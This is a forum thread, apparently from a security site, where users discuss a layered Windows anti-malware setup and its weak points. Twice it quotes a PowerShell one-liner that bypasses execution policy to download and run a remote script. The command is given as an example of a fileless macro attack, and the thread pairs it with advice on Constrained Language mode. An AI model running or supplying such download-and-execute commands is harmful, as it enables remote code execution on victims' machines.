- Feb 10, 2012
- 585
Updated from 413 to 483 build long time ago just upload info here
Nah no need i have 32GB rams on this machine no need molest disk... i never yet had BSOD with windows 10 so no need log to read issue.Please enable pagefile.
This setup can be very strong when used by an experienced user, like @Quassar. I use a very similar, default deny SRP setup, with Windows Defender and forced SmartScreen (instead of Zemana AntiLogger, Malwarebytes v3, and the standard SmartScreen). AppGuard can easily stop/mitigate most of the 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):
powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"
Yet, if not so, then in most cases the malware can be stopped on the later infection stage or finally by Shadow Defender. Anyway, the above PowerShell example (and most penetration PowerShell tools) can be stopped by setting Constrained Language mode.
The second problem for an inexperienced user, may be installing the software. Malwarebytes has only the signatures of the recent malware, so the user can infect himself when executing the older installation files (when ignored by SmartScreen).
SmartScreen has known limitations, when the files come from: pendrives (FAT32), memory cards, DVDs, ISO images, *.arj, *.7z (and other containers), or are downloaded by using download managers (accelerators).
The third problem, can arise when the inexperienced user plays with malware (cracks, keygens), assuming that he/she is safe using Shadow Defender. It should be remembered, that in the case of the worms, they can infect easily the home network members and compromise the Internet connection.
There may be some additional, small security loopholes, but none of them should be a serious problem for the experienced user.
Edit
I noticed that Malwarebytes v3 made significant slowdowns on starting some programs in Sandboxie.
You are secure because you are an experienced user. The inexperienced user will infect himself simply, by ignoring all security alerts, when installing an application (with malware) from a friend's pendrive (he will assume that it is clean).Test it in VMware Workstation
So infection need bypass
1)VMware
2a)HIPS & HIDS + 2 other SRP
2b)Antyvirus + 2 scanners
2c)Windows builded security + hardering which i dont at all trust but any way nice to have not default naked system
Addional
3a )And at last it will work tempolary to next reboot so need bypas SD too if wanna encrypt or modify my files permanently.
3b)If virus its keylogger need bypass keyencryption from zemana.
4) i have 2 PCs and to be "Seriously" donno how about you but i dont login to bank from malware lab pc
Ha, ha. They did not use BitDefender free.Yea that is true long time ago when i worked in pc sevice i had so much pc's infected with solid anti-virus installed on it which it could easy delete popular infection but didn't cause user added it to safelist becaue on xxx foum smb wrote is trusted cracker - source^^
AppGuard can easily stop/mitigate most of the 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):
powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"
More about PowerShell protection:
How-to Guide - How do you secure PowerShell?
Bash is another similar problem. Actually, both PowerShell and Bash can be installed by the malware on the target computer, using the remote server. So, even uninstalling PowerShell would not be bulletproof. The Pandora's box is already opened.I have the best solution of all.
...
Powershell in its entire monstrosity should not be shipped by default with Windows; it should be a user opt-in, manual, standalone installation. Making it such pretty much means only those that actually need and use it - like enterprise Admins - will install it.
It makes no sense that Microsoft ships it, but at the same time advises everyone that does not need it to disable it.
...
So, are you using the separate router too for maximum security?Changed OS malware testing to NO becasue i test it on separate PC/Rasberry which is not connected with rest of my house devices